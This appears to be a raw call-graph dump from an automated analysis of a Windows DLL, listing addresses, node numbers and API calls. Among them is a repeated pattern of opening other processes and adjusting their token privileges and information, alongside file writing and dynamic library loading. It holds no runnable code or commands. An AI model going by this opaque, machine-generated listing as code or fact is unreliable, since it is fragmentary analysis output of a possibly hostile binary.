1000c3bb RtlDecodePointer 41929->41932 41960 1000efa6 HeapDestroy 41930->41960 41931 1000c366 41970 1000e89f 40 API calls _free 41931->41970 41940 1000c3d0 41932->41940 41961 100106ab 41 API calls 2 library calls 41935->41961 41936 1000c2dc 41936->41925 41937 1000c36b 41971 1000efa6 HeapDestroy 41937->41971 41942 1000c3d4 41940->41942 41943 1000c3eb 41940->41943 41941 1000c2f3 41962 100100e2 45 API calls __calloc_crt 41941->41962 41977 1000e8dc 38 API calls 4 library calls 41942->41977 41978 1000b491 41943->41978 41947 1000c2fd 41949 1000c301 41947->41949 41964 100105f0 50 API calls 3 library calls 41947->41964 41948 1000c3db GetCurrentThreadId 41948->41925 41963 1000e89f 40 API calls _free 41949->41963 41952 1000c30d 41953 1000c321 41952->41953 41965 1001037a 49 API calls 6 library calls 41952->41965 41953->41936 41967 10010327 39 API calls _free 41953->41967 41956 1000c316 41956->41953 41966 1000bad8 45 API calls 4 library calls 41956->41966 41958->41915 41959->41927 41960->41936 41961->41941 41962->41947 41963->41930 41964->41952 41965->41956 41966->41953 41967->41949 41968->41918 41969->41931 41970->41937 41971->41923 41972->41925 41974 1000e880 RtlDecodePointer TlsSetValue 41973->41974 41975 1000c3a3 41973->41975 41974->41975 41976 10010048 38 API calls _calloc 41975->41976 41976->41929 41977->41948 41979 1000b49c RtlFreeHeap 41978->41979 41983 1000b4c5 _free 41978->41983 41980 1000b4b1 41979->41980 41979->41983 41985 1000ddf3 41980->41985 41983->41936 41984->41925 41986 1000e990 __getptd_noexit 38 API calls 41985->41986 41987 1000b4b7 GetLastError 41986->41987 41987->41983 41989 1000ba0b __aulldiv 41988->41989 41989->41797 42260 1000ea09 41990->42260 41994 1000ea09 __getptd 38 API calls 41993->41994 41995 1000b8c3 41994->41995 41995->41801 41997 1000ccec 41996->41997 41997->41808 41997->41997 42001 100028c6 _memset __write_nolock 41998->42001 42000 10002d0a Sleep 42000->41819 42000->41822 42006 10002a3f 42001->42006 42283 1000aa9e 42001->42283 42003 10002b0c _memset 42004 10002c8d CreateFileA WriteFile FlushFileBuffers CloseHandle 42003->42004 42005 1000aa9e 45 API calls 42003->42005 42003->42006 42004->42006 42007 10002ba5 _memset 42005->42007 42295 1000ad41 42006->42295 42007->42004 42007->42006 42009 100059e3 42008->42009 42009->42009 42010 10005a13 42009->42010 42011 100059fa 42009->42011 42343 10005bdb 45 API calls std::_Xinvalid_argument 42010->42343 42332 10005a6c 42011->42332 42014 10005a11 42014->41836 42016 10005a6c 45 API calls 42015->42016 42017 10004313 42016->42017 42017->41839 42019 1000a072 __EH_prolog3_GS 42018->42019 42348 1000a49f 42019->42348 42021 1000a0b1 42355 1000961c 42021->42355 42023 1000a0d1 42024 1000a10d 42023->42024 42025 1000a0df wsprintfA 42023->42025 42027 1000a124 42024->42027 42377 10008b91 42024->42377 42029 1000a42c OutputDebugStringA 42025->42029 42032 1000a400 42027->42032 42033 1000a142 42027->42033 42044 1000a44c 42029->42044 42420 10009f6b 47 API calls 42032->42420 42365 1000972f 42033->42365 42037 1000a148 wsprintfA 42037->42029 42040 100096c5 51 API calls 42043 1000a16f 42040->42043 42042 1000a3f6 42419 1000aa30 39 API calls 2 library calls 42042->42419 42043->42027 42043->42040 42043->42042 42046 1000a520 45 API calls 42043->42046 42047 100059cb 45 API calls 42043->42047 42384 1000b7e4 42043->42384 42401 10009fac 42043->42401 42406 1000a59a 42043->42406 42415 10009700 42043->42415 42044->41848 42046->42043 42047->42043 42051 1000aa9e 45 API calls 42050->42051 42052 10002ea4 ReadFile 42051->42052 42053 10002ec1 42052->42053 42054 1000aa9e 45 API calls 42053->42054 42055 10002ede 42054->42055 42783 10002d0c CreateFileA 42055->42783 42057 10002f02 42057->41850 42059 1000afcb 42058->42059 42799 1000ae5b 42059->42799 42061 1000afe2 42061->41853 42064 1000b92b 42062->42064 42065 1000b932 42062->42065 42063 1000ddf3 __output_l 38 API calls 42066 1000b937 42063->42066 42064->42065 42069 1000b960 42064->42069 42065->42063 42821 1000dda1 11 API calls __output_l 42066->42821 42068 10004470 FindWindowExA 42068->41856 42068->41888 42069->42068 42070 1000ddf3 __output_l 38 API calls 42069->42070 42070->42066 42822 10001772 GetCurrentProcess OpenProcessToken 42071->42822 42076 10001926 OpenProcess 42077 1000191e 42076->42077 42078 1000193b OpenProcessToken 42076->42078 42079 100017fe 10 API calls 42077->42079 42080 10001951 CloseHandle 42078->42080 42081 1000195c AdjustTokenPrivileges 42078->42081 42082 10001bbd 42079->42082 42080->42077 42088 100019a0 42081->42088 42089 10001994 42081->42089 42083 10001bc6 OpenProcess 42082->42083 42084 10001e4b 42082->42084 42083->42084 42087 10001bdf OpenProcessToken 42083->42087 42086 100017fe 10 API calls 42084->42086 42090 10001e55 42086->42090 42091 10001c03 AdjustTokenPrivileges 42087->42091 42092 10001bf5 CloseHandle 42087->42092 42098 100019be 42088->42098 42840 100018a0 6 API calls _strtok 42088->42840 42089->42077 42093 100020e3 42090->42093 42094 10001e5e OpenProcess 42090->42094 42091->42084 42102 10001c3f 42091->42102 42092->42084 42095 100017fe 10 API calls 42093->42095 42094->42093 42096 10001e77 OpenProcessToken 42094->42096 42099 100020ed 42095->42099 42100 10001e9b AdjustTokenPrivileges 42096->42100 42101 10001e8d CloseHandle 42096->42101 42106 100019dd 42098->42106 42841 100018a0 6 API calls _strtok 42098->42841 42104 10002376 42099->42104 42105 100020f6 OpenProcess 42099->42105 42100->42093 42114 10001ed7 42100->42114 42101->42093 42115 10001c5d 42102->42115 42854 100018a0 6 API calls _strtok 42102->42854 42107 1000ad41 _strtok 5 API calls 42104->42107 42105->42104 42108 1000210f OpenProcessToken 42105->42108 42117 100019fc 42106->42117 42842 100018a0 6 API calls _strtok 42106->42842 42111 10002386 42107->42111 42112 10002133 AdjustTokenPrivileges 42108->42112 42113 10002125 CloseHandle 42108->42113 42111->41859 42111->41863 42112->42104 42122 1000216f 42112->42122 42113->42104 42119 10001ef5 42114->42119 42868 100018a0 6 API calls _strtok 42114->42868 42120 10001c7c 42115->42120 42855 100018a0 6 API calls _strtok 42115->42855 42125 10001a1b 42117->42125 42843 100018a0 6 API calls _strtok 42117->42843 42127 10001f14 42119->42127 42869 100018a0 6 API calls _strtok 42119->42869 42128 10001c9b 42120->42128 42856 100018a0 6 API calls _strtok 42120->42856 42126 1000218d 42122->42126 42882 100018a0 6 API calls _strtok 42122->42882 42133 10001a3a 42125->42133 42844 100018a0 6 API calls _strtok 42125->42844 42136 100021ac 42126->42136 42883 100018a0 6 API calls _strtok 42126->42883 42137 10001f33 42127->42137 42870 100018a0 6 API calls _strtok 42127->42870 42134 10001cba 42128->42134 42857 100018a0 6 API calls _strtok 42128->42857 42141 10001a59 42133->42141 42845 100018a0 6 API calls _strtok 42133->42845 42143 10001cd9 42134->42143 42858 100018a0 6 API calls _strtok 42134->42858 42145 100021cb 42136->42145 42884 100018a0 6 API calls _strtok 42136->42884 42142 10001f52 42137->42142 42871 100018a0 6 API calls _strtok 42137->42871 42149 10001a78 42141->42149 42846 100018a0 6 API calls _strtok 42141->42846 42156 10001f71 42142->42156 42872 100018a0 6 API calls _strtok 42142->42872 42152 10001cf8 42143->42152 42859 100018a0 6 API calls _strtok 42143->42859 42151 100021ea 42145->42151 42885 100018a0 6 API calls _strtok 42145->42885 42163 10001a97 42149->42163 42847 100018a0 6 API calls _strtok 42149->42847 42165 10002209 42151->42165 42886 100018a0 6 API calls _strtok 42151->42886 42168 10001d17 42152->42168 42860 100018a0 6 API calls _strtok 42152->42860 42158 10001f90 42156->42158 42873 100018a0 6 API calls _strtok 42156->42873 42166 10001faf 42158->42166 42874 100018a0 6 API calls _strtok 42158->42874 42162 10001ab6 42173 10001ad5 42162->42173 42849 100018a0 6 API calls _strtok 42162->42849 42163->42162 42848 100018a0 6 API calls _strtok 42163->42848 42164 10002228 42175 10002247 42164->42175 42888 100018a0 6 API calls _strtok 42164->42888 42165->42164 42887 100018a0 6 API calls _strtok 42165->42887 42176 10001fce 42166->42176 42875 100018a0 6 API calls _strtok 42166->42875 42167 10001d36 42177 10001d55 42167->42177 42862 100018a0 6 API calls _strtok 42167->42862 42168->42167 42861 100018a0 6 API calls _strtok 42168->42861 42181 10001af4 42173->42181 42850 100018a0 6 API calls _strtok 42173->42850 42185 10002266 42175->42185 42889 100018a0 6 API calls _strtok 42175->42889 42182 10001fed 42176->42182 42876 100018a0 6 API calls _strtok 42176->42876 42183 10001d74 42177->42183 42863 100018a0 6 API calls _strtok 42177->42863 42189 10001b13 42181->42189 42851 100018a0 6 API calls _strtok 42181->42851 42191 1000200c 42182->42191 42877 100018a0 6 API calls _strtok 42182->42877 42192 10001d93 42183->42192 42864 100018a0 6 API calls _strtok 42183->42864 42190 10002285 42185->42190 42890 100018a0 6 API calls _strtok 42185->42890 42197 10001b32 42189->42197 42852 100018a0 6 API calls _strtok 42189->42852 42200 100022a4 42190->42200 42891 100018a0 6 API calls _strtok 42190->42891 42201 1000202b 42191->42201 42878 100018a0 6 API calls _strtok 42191->42878 42198 10001db2 42192->42198 42865 100018a0 6 API calls _strtok 42192->42865 42205 10001b52 GetLengthSid SetTokenInformation 42197->42205 42853 100018a0 6 API calls _strtok 42197->42853 42207 10001dd1 42198->42207 42866 100018a0 6 API calls _strtok 42198->42866 42209 100022c3 42200->42209 42892 100018a0 6 API calls _strtok 42200->42892 42206 1000204a 42201->42206 42879 100018a0 6 API calls _strtok 42201->42879 42205->42089 42215 10002069 42206->42215 42880 100018a0 6 API calls _strtok 42206->42880 42216 10001df1 GetLengthSid SetTokenInformation 42207->42216 42867 100018a0 6 API calls _strtok 42207->42867 42214 100022e2 42209->42214 42893 100018a0 6 API calls _strtok 42209->42893 42212 10001b51 42212->42205 42222 10002301 42214->42222 42894 100018a0 6 API calls _strtok 42214->42894 42223 10002089 GetLengthSid SetTokenInformation 42215->42223 42881 100018a0 6 API calls _strtok 42215->42881 42220 10001e41 42216->42220 42220->42084 42221 10001df0 42221->42216 42228 10002321 GetLengthSid SetTokenInformation 42222->42228 42895 100018a0 6 API calls _strtok 42222->42895 42227 100020d9 42223->42227 42226 10002088 42226->42223 42227->42093 42231 10002371 42228->42231 42230 10002320 42230->42228 42231->42104 42896 10010ab0 42232->42896 42235 10003249 42236 1000ad41 _strtok 5 API calls 42235->42236 42237 10003568 Sleep 42236->42237 42237->41878 42239 10003202 _strrchr 42239->42235 42239->42239 42898 10002fdd 6 API calls 3 library calls 42239->42898 42240 1000326b _memset _strncpy 42240->42235 42242 100032f5 _memset 42240->42242 42242->42240 42243 1000ad50 63 API calls _sprintf 42242->42243 42244 10003472 _memset 42242->42244 42899 10002f16 7 API calls _strtok 42242->42899 42243->42242 42245 100034a2 LoadLibraryA 42244->42245 42246 1000cce0 _memset 42245->42246 42247 100034f1 GetProcAddress 42246->42247 42248 1000350d _memset 42247->42248 42248->42235 42249 1000354f FreeLibrary 42248->42249 42249->42235 42900 1000bb6f 42250->42900 42252 1000bcc0 42252->41880 42253->41862 42254->41865 42255->41870 42256->41873 42257->41877 42258->41895 42259->41886 42265 1000e990 GetLastError 42260->42265 42262 1000ea11 42263 1000b8b6 42262->42263 42280 1000bcea 38 API calls 3 library calls 42262->42280 42263->41799 42266 1000e86b ___set_flsgetvalue 3 API calls 42265->42266 42267 1000e9a7 42266->42267 42268 1000e9fd SetLastError 42267->42268 42269 1000e9af 42267->42269 42268->42262 42281 10010048 38 API calls _calloc 42269->42281 42271 1000e9bb 42271->42268 42272 1000e9c3 RtlDecodePointer 42271->42272 42273 1000e9d8 42272->42273 42274 1000e9f4 42273->42274 42275 1000e9dc 42273->42275 42277 1000b491 _free 34 API calls 42274->42277 42282 1000e8dc 38 API calls 4 library calls 42275->42282 42279 1000e9fa 42277->42279 42278 1000e9e4 GetCurrentThreadId 42278->42268 42279->42268 42281->42271 42282->42278 42285 1000bd08 42283->42285 42286 1000bd2c 42285->42286 42288 1000bd2e std::exception::exception 42285->42288 42303 1000b4cb 42285->42303 42320 1000f1d7 RtlDecodePointer 42285->42320 42286->42003 42289 1000bd6c 42288->42289 42321 1000cc43 44 API calls __cinit 42288->42321 42322 1000b0fd 38 API calls std::exception::operator= 42289->42322 42291 1000bd76 42323 1000c527 RaiseException 42291->42323 42294 1000bd87 42296 1000ad49 42295->42296 42297 1000ad4b IsDebuggerPresent 42295->42297 42296->42000 42331 100123ee 42297->42331 42300 1000ce27 SetUnhandledExceptionFilter UnhandledExceptionFilter 42301 1000ce44 __call_reportfault 42300->42301 42302 1000ce4c GetCurrentProcess TerminateProcess 42300->42302 42301->42302 42302->42000 42304 1000b548 42303->42304 42309 1000b4d9 42303->42309 42330 1000f1d7 RtlDecodePointer 42304->42330 42306 1000b4e4 42306->42309 42324 1000f18f 38 API calls __NMSG_WRITE 42306->42324 42325 1000efe0 38 API calls 6 library calls 42306->42325 42326 1000ba57 42306->42326 42307 1000b54e 42310 1000ddf3 __output_l 37 API calls 42307->42310 42309->42306 42311 1000b507 RtlAllocateHeap 42309->42311 42314 1000b534 42309->42314 42318 1000b532 42309->42318 42329 1000f1d7 RtlDecodePointer 42309->42329 42312 1000b540 42310->42312 42311->42309 42311->42312 42312->42285 42316 1000ddf3 __output_l 37 API calls 42314->42316 42316->42318 42319 1000ddf3 __output_l 37 API calls 42318->42319 42319->42312 42320->42285 42321->42289 42322->42291 42323->42294 42324->42306 42325->42306 42327 1000ba2c ___crtCorExitProcess GetModuleHandleW GetProcAddress 42326->42327 42328 1000ba64 ExitProcess 42327->42328 42329->42309 42330->42307 42331->42300 42333 10005a87 42332->42333 42334 10005a7d 42332->42334 42336 10005a97 42333->42336 42337 10005aaf 42333->42337 42344 1000aa30 39 API calls 2 library calls 42334->42344 42345 10005b71 39 API calls 2 library calls 42336->42345 42347 10005bdb 45 API calls std::_Xinvalid_argument 42337->42347 42340 10005aa3 42346 10005b71 39 API calls 2 library calls 42340->42346 42342 10005aad 42342->42014 42343->42014 42344->42333 42345->42340 42346->42342 42347->42342 42349 1000a4b8 42348->42349 42350 1000a4ae 42348->42350 42422 1000a6f2 45 API calls 2 library calls 42349->42422 42421 10005b71 39 API calls 2 library calls 42350->42421 42353 1000a4b6 42353->42021 42354 1000a4c5 42354->42021 42356 10009628 __EH_prolog3 42355->42356 42423 1000bd08 42356->42423 42359 10009648 42435 10008b0f 42359->42435 42363 1000bd08 45 API calls 42364 10009663 42363->42364 42364->42023 42366 10009746 42365->42366 42367 1000973a 42365->42367 42366->42367 42369 10009764 42366->42369 42484 10008a54 42366->42484 42367->42037 42369->42367 42370 10009774 42369->42370 42371 10009779 42369->42371 42372 10008a54 38 API calls 42370->42372 42492 10007df6 CloseHandle 42371->42492 42372->42371 42374 10009780 42375 1000b491 _free 38 API calls 42374->42375 42376 10009786 42375->42376 42376->42367 42497 1000be5b 42377->42497 42380 100096c5 42381 100096da 42380->42381 42382 100096e1 42380->42382 42381->42043 42382->42381 42507 10008bda 42382->42507 42385 1000b7f0 __freefls@4 42384->42385 42386 1000b813 _wprintf 42385->42386 42387 1000b7fe 42385->42387 42612 1000f317 42386->42612 42388 1000ddf3 __output_l 38 API calls 42387->42388 42389 1000b803 42388->42389 42642 1000dda1 11 API calls __output_l 42389->42642 42392 1000b825 _wprintf 42617 1000f3b4 42392->42617 42394 1000b837 _wprintf 42624 1000d06b 42394->42624 42396 1000b84f _wprintf 42643 1000f450 61 API calls __flush 42396->42643 42398 1000b860 42644 1000b878 RtlLeaveCriticalSection RtlLeaveCriticalSection _flsall _wprintf 42398->42644 42400 1000b80e __freefls@4 42400->42043 42404 10009fb8 __EH_prolog3_GS 42401->42404 42403 1000a05b 42403->42043 42404->42403 42405 1000a64a 45 API calls 42404->42405 42684 1000c1ed 42404->42684 42405->42404 42407 1000a5a6 __EH_prolog3 42406->42407 42408 1000a5db 42407->42408 42409 1000a5b5 42407->42409 42410 1000a5cd 42408->42410 42690 1000a69b 45 API calls std::_Xinvalid_argument 42408->42690 42409->42410 42689 1000a69b 45 API calls std::_Xinvalid_argument 42409->42689 42413 1000a5fb 42410->42413 42414 100059a5 45 API calls 42410->42414 42413->42043 42414->42413 42416 10009707 42415->42416 42417 1000970e 42415->42417 42416->42043 42417->42416 42691 100092bd 42417->42691 42419->42032 42420->42037 42421->42353 42422->42354 42425 1000bd12 42423->42425 42424 1000b4cb _malloc 38 API calls 42424->42425 42425->42424 42426 10009632 42425->42426 42430 1000bd2e std::exception::exception 42425->42430 42444 1000f1d7 RtlDecodePointer 42425->42444 42426->42359 42443 10008aba 45 API calls 42426->42443 42428 1000bd6c 42446 1000b0fd 38 API calls std::exception::operator= 42428->42446 42430->42428 42445 1000cc43 44 API calls __cinit 42430->42445 42431 1000bd76 42447 1000c527 RaiseException 42431->42447 42434 1000bd87 42436 10008b18 42435->42436 42441 10008b69 42435->42441 42437 10008b1e GetCurrentDirectoryA 42436->42437 42436->42441 42438 10008b35 42437->42438 42448 10007d6b CreateFileA 42438->42448 42441->42363 42441->42364 42443->42359 42444->42425 42445->42428 42446->42431 42447->42434 42449 10007da4 SetFilePointer 42448->42449 42450 10007d9a 42448->42450 42451 1000bd08 45 API calls 42449->42451 42450->42441 42454 100080e7 42450->42454 42452 10007dc0 42451->42452 42452->42450 42453 10007de0 SetFilePointer 42452->42453 42453->42450 42455 10008103 _memset 42454->42455 42456 100080fc 42454->42456 42457 10007fb6 41 API calls 42455->42457 42456->42441 42458 10008124 42457->42458 42459 10007e17 SetFilePointer 42458->42459 42467 1000813c 42458->42467 42461 10008138 42459->42461 42460 10008165 42463 10008194 42460->42463 42466 10007f10 ReadFile 42460->42466 42464 10007f4c ReadFile 42461->42464 42461->42467 42462 10007f10 ReadFile 42462->42460 42465 1000820f 42463->42465 42468 10007f10 ReadFile 42463->42468 42464->42467 42469 10007df6 CloseHandle 42465->42469 42470 10008181 42466->42470 42467->42460 42467->42462 42475 100081b0 42468->42475 42471 10008217 42469->42471 42470->42463 42472 10007f10 ReadFile 42470->42472 42473 1000821c 42471->42473 42472->42463 42474 1000b4cb _malloc 38 API calls 42473->42474 42476 10008246 42474->42476 42475->42465 42477 10007f4c ReadFile 42475->42477 42478 10008487 SetFilePointer ReadFile 42476->42478 42479 100081d5 42477->42479 42478->42456 42479->42465 42480 10007f4c ReadFile 42479->42480 42481 100081e1 42480->42481 42481->42465 42482 10007f10 ReadFile 42481->42482 42483 100081f1 42482->42483 42483->42465 42483->42473 42485 10008a62 42484->42485 42486 10008a67 42484->42486 42485->42369 42486->42485 42487 10008a94 42486->42487 42488 1000b491 _free 38 API calls 42486->42488 42489 10008aa6 42487->42489 42493 1000790e 42487->42493 42488->42487 42491 1000b491 _free 38 API calls 42489->42491 42491->42485 42492->42374 42494 1000794a 42493->42494 42495 10007915 42493->42495 42494->42489 42495->42494 42496 100078c3 38 API calls 42495->42496 42496->42494 42500 1000bd88 42497->42500 42499 10008ba9 42499->42027 42499->42380 42501 1000add4 _LocaleUpdate::_LocaleUpdate 40 API calls 42500->42501 42502 1000bda3 42501->42502 42503 1000ddf3 __output_l 38 API calls 42502->42503 42505 1000bdc0 _memset _strncpy 42502->42505 42504 1000bdb5 42503->42504 42506 1000dda1 __output_l 11 API calls 42504->42506 42505->42499 42506->42505 42508 10008c0c 42507->42508 42532 10008c31 42507->42532 42510 10008a54 38 API calls 42508->42510 42511 10008c22 42508->42511 42508->42532 42509 1000ad41 _strtok 5 API calls 42512 1000916b 42509->42512 42510->42511 42513 10008c9d 42511->42513 42511->42532 42594 10008487 42511->42594 42512->42381 42515 10008cca 42513->42515 42599 100084bc 42513->42599 42533 10008264 42515->42533 42522 10008d27 42523 1000bd08 45 API calls 42522->42523 42522->42532 42524 10008d40 42523->42524 42609 10007e76 42524->42609 42526 10008d5f 42527 1000bfdf 40 API calls 42526->42527 42528 10008dff 42526->42528 42526->42532 42527->42526 42529 1000be5b __fassign 40 API calls 42528->42529 42530 10008e0e SystemTimeToFileTime LocalFileTimeToFileTime 42529->42530 42530->42532 42532->42509 42534 10008280 42533->42534 42568 10008278 42533->42568 42535 10007e17 SetFilePointer 42534->42535 42536 1000828f 42535->42536 42537 10007f4c ReadFile 42536->42537 42539 10008293 42536->42539 42537->42539 42538 10007f10 ReadFile 42540 100082ca 42538->42540 42539->42538 42541 10007f10 ReadFile 42540->42541 42542 100082e0 42541->42542 42543 10007f10 ReadFile 42542->42543 42544 100082f3 42543->42544 42545 10007f10 ReadFile 42544->42545 42546 10008306 42545->42546 42547 10007f4c ReadFile 42546->42547 42548 10008319 42547->42548 42549 10007f4c ReadFile 42548->42549 42550 10008373 42549->42550 42551 10007f4c ReadFile 42550->42551 42552 10008385 42551->42552 42553 10007f4c ReadFile 42552->42553 42554 10008397 42553->42554 42555 10007f10 ReadFile 42554->42555 42556 100083a9 42555->42556 42557 10007f10 ReadFile 42556->42557 42558 100083bc 42557->42558 42559 10007f10 ReadFile 42558->42559 42560 100083cf 42559->42560 42561 10007f10 ReadFile 42560->42561 42562 100083e2 42561->42562 42563 10007f10 ReadFile 42562->42563 42564 100083f5 42563->42564 42565 10007f4c ReadFile 42564->42565 42566 10008408 42565->42566 42567 10007f4c ReadFile 42566->42567 42569 1000841a 42567->42569 42571 1000850d 42568->42571 42569->42568 42570 10007e76 ReadFile 42569->42570 42570->42568 42572 10007e17 SetFilePointer 42571->42572 42573 1000853b 42572->42573 42574 1000853f 42573->42574 42575 10007f4c ReadFile 42573->42575 42574->42532 42604 10007e17 42574->42604 42576 10008552 42575->42576 42577 10007f10 ReadFile 42576->42577 42578 10008579 42577->42578 42579 10007f10 ReadFile 42578->42579 42580 1000858c 42579->42580 42581 10007f10 ReadFile 42580->42581 42583 1000859f 42581->42583 42582 10007f4c ReadFile 42584 100085d2 42582->42584 42583->42582 42585 10007f4c ReadFile 42584->42585 42586 100085e4 42585->42586 42587 10007f4c ReadFile 42586->42587 42588 10008613 42587->42588 42589 10007f4c ReadFile 42588->42589 42590 10008642 42589->42590 42591 10007f10 ReadFile 42590->42591 42592 10008671 42591->42592 42593 10007f10 ReadFile 42592->42593 42593->42574 42595 10008491 42594->42595 42596 1000848c 42594->42596 42597 10008264 SetFilePointer ReadFile 42595->42597 42596->42513 42598 100084ad 42597->42598 42598->42513 42600 100084c6 42599->42600 42601 100084c1 42599->42601 42600->42601 42602 10008264 SetFilePointer ReadFile 42600->42602 42601->42513 42603 100084fe 42602->42603 42603->42513 42605 10007e53 42604->42605 42607 10007e1d 42604->42607 42605->42522 42606 10007e40 SetFilePointer 42606->42605 42607->42606 42608 10007e4b 42607->42608 42608->42522 42610 10007e9d 42609->42610 42611 10007e86 ReadFile 42609->42611 42610->42526 42611->42610 42613 1000f324 42612->42613 42614 1000f33a RtlEnterCriticalSection 42612->42614 42645 1000f7d2 42613->42645 42614->42392 42616 1000f32d 42616->42392 42652 10012dd5 42617->42652 42619 1000f3c3 42659 10012d7f 42619->42659 42621 1000f3c9 _wprintf 42622 1000f416 42621->42622 42668 10010003 42621->42668 42622->42394 42674 1000add4 42624->42674 42627 1000d0d6 42628 1000ddf3 __output_l 38 API calls 42627->42628 42629 1000d0db 42628->42629 42682 1000dda1 11 API calls __output_l 42629->42682 42630 10012dd5 __output_l 38 API calls 42639 1000d10d __output_l __aulldvrm _strlen 42630->42639 42632 1000d0e6 42633 1000ad41 _strtok 5 API calls 42632->42633 42634 1000dbf2 42633->42634 42634->42396 42636 1000b491 _free 38 API calls 42636->42639 42637 10012f50 42 API calls __cftof 42637->42639 42638 10010003 __malloc_crt 38 API calls 42638->42639 42639->42627 42639->42632 42639->42636 42639->42637 42639->42638 42640 1000cfc4 61 API calls __output_l 42639->42640 42641 1000cff7 61 API calls _write_string 42639->42641 42683 1000edcb 40 API calls _LocaleUpdate::_LocaleUpdate 42639->42683 42640->42639 42641->42639 42642->42400 42643->42398 42644->42400 42646 1000f7e7 42645->42646 42647 1000f7fa RtlEnterCriticalSection 42645->42647 42648 1000f710 __mtinitlocknum 37 API calls 42646->42648 42647->42616 42649 1000f7ed 42648->42649 42649->42647 42650 1000bcea __amsg_exit 37 API calls 42649->42650 42651 1000f7f9 42650->42651 42651->42647 42653 10012de1 42652->42653 42654 10012df6 42652->42654 42655 1000ddf3 __output_l 38 API calls 42653->42655 42654->42619 42656 10012de6 42655->42656 42657 1000dda1 __output_l 11 API calls 42656->42657 42658 10012df1 42657->42658 42658->42619 42660 10012d9b 42659->42660 42661 10012d8c 42659->42661 42664 10012db9 42660->42664 42665 1000ddf3 __output_l 38 API calls 42660->42665 42662 1000ddf3 __output_l 38 API calls 42661->42662 42663 10012d91 42662->42663 42663->42621 42664->42621 42666 10012dac 42665->42666 42667 1000dda1 __output_l 11 API calls 42666->42667 42667->42663 42671 1001000c 42668->42671 42669 1000b4cb _malloc 37 API calls 42669->42671 42670 10010042 42670->42622 42671->42669 42671->42670 42672 10010023 Sleep 42671->42672 42673 10010038 42672->42673 42673->42670 42673->42671 42675 1000ade7 42674->42675 42676 1000ae34 42674->42676 42677 1000ea09 __getptd 38 API calls 42675->42677 42676->42627 42676->42630 42676->42639 42678 1000adec 42677->42678 42679 1000e7e0 _LocaleUpdate::_LocaleUpdate 38 API calls 42678->42679 42680 1000ae14 42678->42680 42679->42680 42680->42676 42681 1000e05f __setmbcp 40 API calls 42680->42681 42681->42676 42682->42632 42683->42639 42685 1000ea09 __getptd 38 API calls 42684->42685 42686 1000c210 42685->42686 42687 1000ad41 _strtok 5 API calls 42686->42687 42688 1000c2a8 42687->42688 42688->42404 42689->42410 42690->42410 42692 100092f2 42691->42692 42693 100092f9 42691->42693 42694 10008a54 38 API calls 42692->42694 42695 10009307 42693->42695 42696 1000931d 42693->42696 42698 10008487 2 API calls 42693->42698 42694->42693 42697 1000ad41 _strtok 5 API calls 42695->42697 42699 10009338 42696->42699 42700 100084bc 2 API calls 42696->42700 42702 10009600 42697->42702 42698->42696 42701 10008bda 51 API calls 42699->42701 42700->42696 42703 1000934c 42701->42703 42702->42416 42704 10009388 42703->42704 42706 1000935b 42703->42706 42705 1000be5b __fassign 40 API calls 42704->42705 42709 100093b9 42705->42709 42707 1000916f 44 API calls 42706->42707 42707->42695 42708 10009494 42710 1000ad50 _sprintf 63 API calls 42708->42710 42709->42708 42712 100093c4 _memset 42709->42712 42711 100094ad 42710->42711 42713 1000916f 44 API calls 42711->42713 42716 1000b91d _strcat_s 38 API calls 42712->42716 42714 100094bc CreateFileA 42713->42714 42714->42695 42717 10009521 42714->42717 42720 1000942c 42716->42720 42762 100086d0 42717->42762 42719 1000952e 42721 1000bd08 45 API calls 42719->42721 42727 10009541 42719->42727 42733 1000ad50 42720->42733 42721->42727 42726 100095a6 42729 10008a54 38 API calls 42726->42729 42727->42726 42728 1000957a WriteFile 42727->42728 42777 10008829 42727->42777 42728->42726 42728->42727 42730 100095b7 42729->42730 42731 100095c0 SetFileTime 42730->42731 42732 100095e1 CloseHandle 42730->42732 42731->42732 42732->42695 42734 1000ad83 42733->42734 42735 1000ad6e 42733->42735 42734->42735 42737 1000ad8a 42734->42737 42736 1000ddf3 __output_l 38 API calls 42735->42736 42738 1000ad73 42736->42738 42739 1000d06b __output_l 63 API calls 42737->42739 42740 1000dda1 __output_l 11 API calls 42738->42740 42741 1000adb0 42739->42741 42742 100094d5 42740->42742 42741->42742 42743 1000ce60 __flsbuf 61 API calls 42741->42743 42744 1000916f 42742->42744 42743->42742 42745 1000918e 42744->42745 42753 100091ee 42744->42753 42747 1000be5b __fassign 40 API calls 42745->42747 42746 100092af 42748 1000ad41 _strtok 5 API calls 42746->42748 42750 100091a0 GetFileAttributesA 42747->42750 42749 100092bb 42748->42749 42749->42714 42752 100091df CreateDirectoryA 42750->42752 42750->42753 42752->42753 42753->42746 42754 10009237 42753->42754 42757 1000916f 40 API calls 42753->42757 42755 10009258 42754->42755 42756 1000be5b __fassign 40 API calls 42754->42756 42759 1000be5b __fassign 40 API calls 42755->42759 42756->42755 42757->42754 42760 10009287 GetFileAttributesA 42759->42760 42760->42746 42761 100092a0 CreateDirectoryA 42760->42761 42761->42746 42763 100086e8 42762->42763 42776 100086e0 42762->42776 42764 100086f7 42763->42764 42765 10008a54 38 API calls 42763->42765 42763->42776 42766 1000850d SetFilePointer ReadFile 42764->42766 42765->42764 42767 1000870b 42766->42767 42768 1000b4cb _malloc 38 API calls 42767->42768 42767->42776 42769 10008721 42768->42769 42770 1000b4cb _malloc 38 API calls 42769->42770 42769->42776 42771 10008732 42770->42771 42772 10008757 42771->42772 42773 10008748 42771->42773 42775 10007966 38 API calls 42772->42775 42772->42776 42774 1000b491 _free 38 API calls 42773->42774 42774->42776 42775->42776 42776->42719 42780 10008841 42777->42780 42778 10007e17 SetFilePointer 42778->42780 42779 100079ff IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 42779->42780 42780->42778 42780->42779 42781 10007e76 ReadFile 42780->42781 42782 10008848 42780->42782 42781->42780 42782->42727 42784 10002e62 42783->42784 42787 10002d60 _memset 42783->42787 42785 1000ad41 _strtok 5 API calls 42784->42785 42786 10002e6d 42785->42786 42786->42057 42787->42787 42788 10002d8b Sleep 42787->42788 42789 10002da1 42788->42789 42790 10002e22 WriteFile 42789->42790 42791 10002dc8 42789->42791 42793 10002e48 FlushFileBuffers 42790->42793 42792 1000b4cb _malloc 38 API calls 42791->42792 42795 10002dd3 _memset 42792->42795 42794 10002e54 CloseHandle 42793->42794 42794->42784 42795->42794 42796 10002e00 WriteFile 42795->42796 42797 1000b491 _free 38 API calls 42796->42797 42798 10002e1f 42797->42798 42798->42793 42800 1000ae6e 42799->42800 42801 1000ae89 42800->42801 42802 1000ae9e 42800->42802 42812 1000ae73 _strlen 